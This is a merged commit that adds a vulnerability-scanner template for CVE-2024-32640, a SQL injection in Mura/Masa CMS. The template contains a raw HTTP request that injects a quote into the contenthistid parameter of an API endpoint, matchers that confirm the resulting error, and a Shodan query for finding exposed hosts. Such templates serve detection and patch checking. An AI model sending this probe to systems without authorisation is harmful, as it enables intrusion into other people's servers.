Merge pull request #9721 from projectdiscovery/CVE-2024-32640

Added CVE-2024-32640 (Mura/Masa CMS - SQL Injection)
2024-05-08 11:30:44 +05:30 · 2024-05-08 11:30:44 +05:30 · 1c5cd99ee3
parent 12e531901c 7476bc5a52
commit 1c5cd99ee3
1 changed files with 40 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-32640.yaml
+++ b/http/cves/2024/CVE-2024-32640.yaml
@ -0,0 +1,40 @@
+id: CVE-2024-32640
+
+info:
+  name: Mura/Masa CMS - SQL Injection
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    The Mura/Masa CMS is vulnerable to SQL Injection.
+  impact: |
+    Successful exploitation could lead to unauthorized access to sensitive data.
+  remediation: |
+    Apply the vendor-supplied patch or update to a secure version.
+  reference:
+    - https://blog.projectdiscovery.io/hacking-apple-with-sql-injection/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32640
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: masacms
+    product: masacms
+    shodan-query: 'Generator: Masa CMS'
+  tags: cve,cve2024,sqli,cms,masa,masacms
+
+http:
+  - raw:
+      - |
+        POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        object=displayregion&contenthistid=x\'&previewid=1
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 500'
+          - 'contains(header, "application/json")'
+          - 'contains_all(body, "Unhandled Exception")'
+          - 'contains_all(header,"cfid","cftoken")'
+        condition: and